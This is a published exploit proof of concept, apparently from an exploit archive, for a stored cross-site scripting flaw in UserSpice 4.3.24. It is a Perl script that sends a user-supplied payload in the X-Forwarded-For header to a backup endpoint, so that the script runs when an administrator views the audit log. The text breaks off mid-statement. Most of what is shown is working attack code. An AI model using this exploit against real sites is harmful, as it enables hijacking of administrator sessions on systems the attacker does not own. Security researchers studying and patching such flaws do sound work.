# Exploit Title: userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting # Date: 2018-06-10 # Author: Dolev Farhi # Vendor or Software Link: www.userspice.com # Version: 4.3.24 # Tested on: Ubuntu # Payload will get executed when admin visits the audit log page #!/usr/bin/perl use strict; use LWP::UserAgent; print "UserSpice 4.3.24 X-Forwarded-For XSS PoC\n"; if ($#ARGV != 0 ) { print "usage: $0
\n"; exit 1; } my $server = $ARGV[0] . "/users/cron/backup.php?from=users/cron_manager.php/"; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => 'http://' . $server); print "Enter payload: "; my $xff =